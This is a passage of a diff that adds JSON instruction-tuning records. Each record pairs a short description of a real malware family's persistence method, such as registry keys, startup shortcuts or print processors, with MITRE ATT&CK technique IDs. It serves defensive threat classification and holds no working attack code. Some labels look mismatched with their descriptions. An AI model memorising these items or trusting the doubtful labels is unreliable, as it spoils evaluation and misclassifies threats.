ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Volgmer installs a copy of itself in a randomly selected service, then overwrites the ServiceDLL entry in the service's Registry entry. Some Volgmer variants also install .dll files as services with names generated by a list of hard-coded strings.", + "output": "- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ZLib creates Registry keys to allow itself to run as various services.", + "output": "- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Linux Rabbit maintains persistence on an infected machine through rc.local and .bashrc files.", + "output": "- T1546.004: Event Triggered Execution - Unix Shell Configuration Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Empire can leverage WMI debugging to remotely replace binaries like sethc.exe, Utilman.exe, and Magnify.exe with cmd.exe.", + "output": "- T1546.008: Event Triggered Execution - Accessibility Features" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Honeybee's service-based DLL implant can execute a downloaded file with parameters specified using \"\"CreateProcessAsUser\"\".\"", + "output": "- T1546.009: Event Triggered Execution - AppCert DLLs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PUNCHBUGGY can establish using a AppCertDLLs Registry key.", + "output": "- T1546.009: Event Triggered Execution - AppCert DLLs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"ShimRat has installed shim databases in the \"\"AppPatch\"\" folder.\"", + "output": "- T1546.011: Event Triggered Execution - Application Shimming" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "KONNI has modified ComSysApp service to load the malicious DLL payload.", + "output": "- T1546.015: Event Triggered Execution - Component Object Model Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"BoxCaon established persistence by setting the \"\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\"\" registry key to point to its executable.\"", + "output": "- T1547: Boot or Logon Autostart Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dtrack\u2019s RAT makes a persistent target file with auto execution on the host start.", + "output": "- T1547: Boot or Logon Autostart Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LoudMiner can automatically launch at startup if the AutoStart option is enabled in the VBoxVmService configuration file.", + "output": "- T1547: Boot or Logon Autostart Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Misdat has created registry keys for persistence, including `HKCU\\Software\\dnimtsoleht\\StubPath`, `HKCU\\Software\\snimtsOleht\\StubPath`, `HKCU\\Software\\Backtsaleht\\StubPath`, `HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed. Components\\{3bf41072-b2b1-21c8-b5c1-bd56d32fbda7}`, and `HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{3ef41072-a2f1-21c8-c5c1-70c2c3bc7905}`.", + "output": "- T1547: Boot or Logon Autostart Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"xCaon has added persistence via the Registry key \"\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\"\" which causes the malware to run each time any user logs in.\"", + "output": "- T1547: Boot or Logon Autostart Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A version of KONNI has dropped a Windows shortcut into the Startup folder to establish persistence.", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"BBSRAT has been loaded through DLL side-loading of a legitimate Citrix executable that is set to persist through the Registry Run key location \"\"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ssonsvr.exe\"\".\"", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FELIXROOT adds a shortcut file to the startup folder for persistence.", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Gazer can establish persistence by creating a .lnk file in the Start menu.", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Honeybee uses a batch file that configures the ComSysApp service to autostart in order to establish persistence.", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "JHUHUGIT has used a Registry Run key to establish persistence by executing JavaScript code within the rundll32.exe process.", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Leviathan has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"LoJax has modified the Registry key \"\"\u2018HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\BootExecute\u2019\"\" from \"\"\u2018autocheck autochk *\u2019\"\" to \"\"\u2018autocheck autoche *\u2019\"\" in order to execute its payload during Windows startup.\"", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Maze has created a file named \"\"startup_vrun.bat\"\" in the Startup folder of a virtual machine to establish persistence.\"", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NanHaiShu modifies the %regrun% Registry to point itself to an autostart mechanism.", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ObliqueRAT can gain persistence by a creating a shortcut in the infected user's Startup directory.", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Okrum establishes persistence by creating a .lnk shortcut to itself in the Startup folder.", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RedLeaves attempts to add a shortcut file in the Startup folder to achieve persistence. If this fails, it attempts to add Registry Run keys.", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Revenge RAT creates a Registry key at \"\"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\"\" to survive a system reboot.\"", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"S-Type may create a .lnk file to itself that is saved in the Start menu folder. It may also create the Registry key \"\"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ IMJPMIJ8.1{3 characters of Unique Identifier}\"\".\"", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SILENTTRINITY can establish a LNK file in the startup folder for persistence.", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SPACESHIP achieves persistence by creating a shortcut in the current user's Startup folder.", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TeamTNT has added batch scripts to the startup folder.", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Tropic Trooper has created shortcuts in the Startup folder to establish persistence.", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Windshift has created LNK files in the Startup folder to establish persistence.", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Winnti for Windows can add a service named \"\"wind0ws\"\" to the Registry to achieve persistence after reboot.\"", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Mimikatz credential dumper contains an implementation of an SSP.", + "output": "- T1547.005: Boot or Logon Autostart Execution - Security Support Provider" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Operation CuckooBees, attackers used a signed kernel rootkit to establish additional persistence.", + "output": "- T1547.006: Boot or Logon Autostart Execution - Kernel Modules and Extensions" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Pasam establishes by infecting the Security Accounts Manager (SAM) DLL to load a malicious DLL dropped to disk.", + "output": "- T1547.008: Boot or Logon Autostart Execution - LSASS Driver" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Wingbird drops a malicious file (sspisrv.dll) alongside a copy of lsass.exe, which is used to register a service that loads sspisrv.dll as a driver. The payload of the malicious driver (located in its entry-point function) is executed when loaded by lsass.exe before the spoofed service becomes unstable and crashes.", + "output": "- T1547.008: Boot or Logon Autostart Execution - LSASS Driver" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT29 drops a Windows shortcut file for execution.", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Comnie establishes persistence via a .lnk file in the victim\u2019s startup path.", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Gazer can establish persistence by creating a .lnk file in the Start menu or by modifying existing .lnk files to execute the malware through cmd.exe.", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kazuar adds a .lnk file to the Windows startup folder.", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"S-Type may create the file \"\"%HOMEPATH%\\Start Menu\\Programs\\Startup\\Realtek {Unique Identifier}.lnk\"\", which points to the malicious `msdtc.exe` file already created in the `%CommonFiles%` directory.\"", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Earth Lusca has added the Registry key `HKLM\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\Windows x64\\Print Processors\\UDPrint\u201d /v Driver /d \u201cspool.dll /f` to load malware as a Print Processor.", + "output": "- T1547.012: Boot or Logon Autostart Execution - Print Processors" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Gelsemium can drop itself in \"\"C:\\Windows\\System32\\spool\\prtprocs\\x64\\winprint.dll\"\" to be loaded automatically by the spoolsv Windows service.\"", + "output": "- T1547.012: Boot or Logon Autostart Execution - Print Processors" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The PipeMon installer has modified the Registry key \"\"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Print Processors\"\" to install PipeMon as a Print Processor.\"", + "output": "- T1547.012: Boot or Logon Autostart Execution - Print Processors" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Fysbis has installed itself as an autostart entry under 